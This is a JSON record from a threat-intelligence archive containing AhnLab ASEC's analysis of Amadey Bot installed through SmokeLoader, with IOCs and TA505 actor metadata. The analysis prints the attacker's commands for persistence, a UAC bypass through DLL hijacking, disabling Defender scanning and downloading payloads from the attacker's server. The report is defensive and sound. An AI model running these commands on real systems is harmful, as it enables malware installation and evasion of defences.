{ "id": "0853491c-2c7e-45c5-a5c5-267ab357a241", "created_at": "2026-04-06T00:08:42.226024Z", "updated_at": "2026-04-10T03:36:36.825494Z", "deleted_at": null, "sha1_hash": "0b80a7e24653868fbeef1bcdaa63e70c098b1316", "title": "Amadey Bot Being Distributed Through SmokeLoader - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1857135, "plain_text": "Amadey Bot Being Distributed Through SmokeLoader - ASEC\r\nBy ATCP\r\nPublished: 2022-07-10 · Archived: 2026-04-05 16:04:41 UTC\r\nAmadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing\r\nadditional malware by receiving commands from the attacker. Like other malware strains, it has been sold in\r\nillegal forums and used by various attackers.\r\nThe ASEC analysis team previously revealed cases where Amadey was used on attacks in the ASEC blog posted\r\nin 2019 (English version unavailable). Amadey was mainly used to install ransomware by attackers of GandCrab\r\nor to install FlawedAmmyy by the TA505 group that is infamous for Clop ransomware. The attackers of Fallout\r\nExploit Kit and Rig Exploit Kit are also known for using Amadey.\r\nThe team has recently discovered that Amadey is being installed by SmokeLoader. SmokeLoader is a malware\r\nthat has continuously been distributed during the last few years, taking up high proportion in the recent ASEC\r\nstatistics. It is recently distributed by having users download the malware that is disguised as software cracks and\r\nserial generation programs from websites for distribution.\r\nSmokeLoader provides various additional features related to info-stealing as plug-ins. It is normally used to\r\ninstall additional malware strains as a downloader. When SmokeLoader is run, it injects Main Bot into the\r\ncurrently running explorer process (explorer.exe). This means Bot that performs actual malicious behaviors\r\noperates inside the explorer process. The figure below shows AhnLab’s ASD log of SmokeLoader, which has been\r\ninjected into explorer, downloading Amadey.\r\nWhen Amadey is run, it first copies itself to the Temp path below. Then, Amadey registers the folder where it\r\nexists as a startup folder to allow itself to be run after reboot. It also provides a feature to register itself to Task\r\nScheduler to maintain persistence.\r\nAmadey Installation Path\r\n\u003e %TEMP%\\9487d68b99\\bguuwe.exe\r\nCommand registered to Task Scheduler\r\n\u003e cmd.exe /C REG ADD “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell\r\nFolders” /f /v Startup /t REG_SZ /d %TEMP%\\9487d68b99\\\r\n\u003e schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR\r\n“%TEMP%\\9487d68b99\\bguuwe.exe” /F\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 1 of 10\n\nAfter going through the process mentioned above, the malware starts communicating with the C\u0026C server. The\r\nfollowing Fiddler log shows Amadey communicating with the C\u0026C server, downloading the cred.dll plug-in to\r\ncollect user environment information and send aos매to the C\u0026C server, and installing RedLine info-stealer as an\r\nadditional malware strain.\r\nThe malware collects the information of the infected system before it connects to the C\u0026C server. The information\r\ncollected includes basic information such as computer name and user name, as well as a list of installed anti-malware products. Each part of the collected information is sent to the C\u0026C server in an appropriate format. The\r\nserver then can send the URL of additional malware strains that Amadey will download to make it operate as a\r\ndownloader.\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 2 of 10\n\nItem Data Example Meaning\r\nid 129858768759 Infected system’s ID\r\nvs 3.21 Amadey version\r\nsd 37bbd7 Amadey ID\r\nos 9\r\nWindows version\r\nex) Windows 7 – 9\r\nWindows 10 – 1\r\nWindows Server 2012 – 4\r\nWindows Server 2019 – 16\r\nbi 0 Architecture (x86 – 0, x64 – 1)\r\nar 0 Admin privilege status (1 if admin privilege is available)\r\npc PCNAME Computer name\r\nun USERNAME User name\r\ndm DOMAINNAME Domain name\r\nav 0 List of installed anti-malware\r\nlv 0 Set as 0\r\nog 1 Set as 1\r\nTable 1. Data sent to the C\u0026C server\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 3 of 10\n\nThe table above indicates that the current version of Amadey discussed in this post is 3.21. Accessing the C\u0026C\r\npanel of the current Amadey version under analysis shows how the current version is slightly different from the\r\nprevious one.\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 4 of 10\n\nAmong items sent to the C\u0026C server, “av” refers to the information of anti-malware installed on the infected\r\nenvironment. Each number is assigned to a particular anti-malware product. As ’13’ is chosen if the infected\r\nenvironment is Windows 10 or Windows Server 2019, it is likely the number is reserved for Windows Defender.\r\nAnti-malware Name Number\r\nX 0\r\nAvast Software 1\r\nAvira 2\r\nKaspersky Lab 3\r\nESET 4\r\nPanda Security 5\r\nDr. Web 6\r\nAVG 7\r\n360 Total Security 8\r\nBitdefender 9\r\nNorton 10\r\nSophos 11\r\nComodo 12\r\nWindows Defender (assumed) 13\r\nTable 2. List of anti-malware for checking\r\nAmadey also periodically takes screenshots and sends them to the C\u0026C server. It captures the current screen in a\r\nJPG format and saves it with the name “129858768759” in the %TEMP% path. The screenshot is later sent to the\r\nC\u0026C server with the POST method.\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 5 of 10\n\nThe network traffic figure shown above has “cred.dll”, meaning the malware downloaded a plug-in for stealing\r\ninformation. The plug-in developed with the Delphi programming language is downloaded to the %APPDATA%\r\npath. It is then run through rundll32.exe as having the Export function Main() as an argument as shown below.\r\n\u003e rundll32.exe %APPDATA%\\406d6c22b040c6\\cred.dll, Main\r\nThe list of information that is stolen includes emails, FTPs, VPN clients, etc. The information collected is sent to\r\nthe same C\u0026C server.\r\nList of information targeted for info-stealing plug-in\r\n– Mikrotik Router Management Program Winbox\r\n– Outlook\r\n– FileZilla\r\n– Pidgin\r\n– Total Commander FTP Client\r\n– RealVNC, TightVNC, TigerVNC\r\n– WinSCP\r\nThe Fiddler log mentioned above shows how Amadey installed additional malware from\r\n“hxxp://185.17.0[.]52/yuri.exe” besides the cred.dll plug-in. When Amadey periodically communicates with the\r\nC\u0026C server to send the information of the infected system, the server usually sends the NULL data back.\r\nHowever, it can send a downloader command depending on the command. The downloader command is sent with\r\nencoded data, and decoding it will allow the malware to receive an URL for downloading additional malware. The\r\nmalware downloaded from the URL is RedLine info-stealer.\r\nAccessing “hxxp://185.17.0[.]52/” shows a list of files.\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 6 of 10\n\nThe table below explains each file. They include Amadey, RedLine, and downloader malware types used to install\r\nthem.\r\nName Type\r\nProxy.exe Autoit downloader malware\r\na.exe Amadey (unpacked original version)\r\nama.exe Amadey (NULL data added to a.exe)\r\nau.exe Amadey (packed)\r\nbin Amadey downloader (x64 DLL)\r\nxyz.exe Downloader (installs bin)\r\nyuri.exe RedLine info-stealer\r\nTable 3. List of malware strains\r\nxyz.exe and bin, which are downloader malware types, are developed with the Rust programming language.\r\nxyz.exe downloads bin and supports privilege escalation using the UAC bypass technique. The technique exploits\r\nAutoElevate and the mechanisms of AIS. AutoElevate is a program with the “\u003cautoElevate\u003etrue\u003c/autoElevate\u003e”\r\nproperty as shown below. If certain conditions are met, it can be run as admin privilege without a UAC pop-up.\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 7 of 10\n\nTo do so, the program needs to be run in a trusted location such as System32 besides the property mentioned\r\nabove. Hence the malware created the “C:\\Windows \\System32\\” folder as shown below and copied\r\n“FXSUNATD.exe” (AutoElevate program) to satisfy the condition. AIS ignores spacings when internally\r\nchecking paths. So if “FXSUNATD.exe” is run in the path mentioned earlier, it is recognized as being executed\r\nfrom a normal System32 path. The path check is successful and the program is run as AutoElevate (admin\r\nprivilege).\r\n\u003e powershell.exe “New-Item -ItemType Directory ‘\\?\\C:\\Windows \\System32’; Copy-Item -Path\r\n‘C:\\Windows\\System32\\FXSUNATD.exe’ -Destination ‘C:\\Windows \\System32\\’; powershell -\r\nwindowstyle hidden $ProgressPreference= ‘SilentlyContinue’; Invoke-WebRequest\r\nhxxp://185.17.0[.]52/bin -Outfile ‘C:\\Windows \\System32\\version.dll'”\r\n\u003e powershell.exe “Start-Process ‘C:\\Windows \\System32\\FXSUNATD.exe'”\r\nThe malware then downloads a malicious DLL named version.dll in the same path. version.dll is a DLL used by\r\n“FXSUNATD.exe”. If the file is in the same path as “FXSUNATD.exe”, the DLL is executed first following the\r\nDLL load order when the exe program is run. The process is called DLL hijacking. By exploiting this mechanic,\r\nthe malware loaded on a normal program is executed as “FXSUNATD.exe” is run after the malicious DLL\r\n(version.dll) is created in the same path.\r\nbin (version.dll) loaded and executed by “FXSUNATD.exe” is a downloader that installs Amadey and RedLine.\r\nWhen it is run, it uses the Windows Defender command to register the %ALLUSERSPROFILE% folder and\r\n%LOCALAPPDATA% directory that includes the Temp directory as exclusions. It then downloads and runs each\r\nmalware type.\r\n\u003e powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\\ProgramData\\; Add-MpPreference -ExclusionPath $env:TEMP\\; Add-MpPreference -ExclusionPath\r\n$env:LOCALAPPDATA\\\r\n\u003e powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile\r\n$env:TEMP\\msconfig.exe;\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 8 of 10\n\n\u003e powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/ama.exe -OutFile\r\n$env:TEMP\\taskhost.exe\r\nInitially distributed through exploit kits in the past, Amadey has been installed through SmokeLoader from\r\nmalicious websites disguised as download pages for cracks and serials of commercial software until recently.\r\nOnce the malware is installed, it can stay in the system to steal user information and download additional\r\npayloads. Users should apply the latest patch for OS and programs such as Internet browsers, and update V3 to the\r\nlatest version to prevent malware infection in advance.\r\nAhnLab’s anti-malware software, V3, detects and blocks the malware above using the aliases below.\r\n[File Detection]\r\n– Trojan/Win.MalPE.R503126 (2022.07.07.01)\r\n– Trojan/Win.Amadey.C5196504 (2022.07.07.02)\r\n– Trojan/Win.Delf.R462350 (2022.01.04.02)\r\n– Trojan/Win.Generic.R503640 (2022.07.09.01)\r\n– Downloader/Win.AutoIt.C5200737 (2022.07.11.00)\r\n– Malware/Win.Trojanspy.R438708 (2021.08.25.01)\r\n– Trojan/Win.Amadey.C5200739 (2022.07.11.00)\r\n– Downloader/Win.Agent.C5198969 (2022.07.10.00)\r\n– Downloader/Win.Agent.C5198968 (2022.07.10.00)\r\n[Behavior Detection]\r\n– Malware/MDP.Download.M1197\r\n– Execution/MDP.Powershell.M2514\r\nMD5\r\n0f4351c43a09cb581dc01fe0ec08ff83\r\n0fd121b4a221c7767bd58f49c3d7cda5\r\n18bb226e2739a3ed48a96f9f92c91359\r\n27f626db46fd22214c1eb6c63193d2a0\r\n600bb5535d0bfc047f5c61f892477045\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//185[.]17[.]0[.]52/Proxy[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/a[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/ama[.]exe\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 9 of 10\n\nhttp[:]//185[.]17[.]0[.]52/au[.]exe\r\nhttp[:]//185[.]17[.]0[.]52/bin\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/36634/\r\nhttps://asec.ahnlab.com/en/36634/\r\nPage 10 of 10\n\n https://asec.ahnlab.com/en/36634/ \nThe table above indicates that the current version of Amadey discussed in this post is 3.21. Accessing the C\u0026C\npanel of the current Amadey version under analysis shows how the current version is slightly different from the\nprevious one. \n Page 4 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/36634/" ], "report_names": [ "36634" ], "threat_actors": [ { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434122, "ts_updated_at": 1775792196, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0b80a7e24653868fbeef1bcdaa63e70c098b1316.pdf", "text": "https://archive.orkl.eu/0b80a7e24653868fbeef1bcdaa63e70c098b1316.txt", "img": "https://archive.orkl.eu/0b80a7e24653868fbeef1bcdaa63e70c098b1316.jpg" } }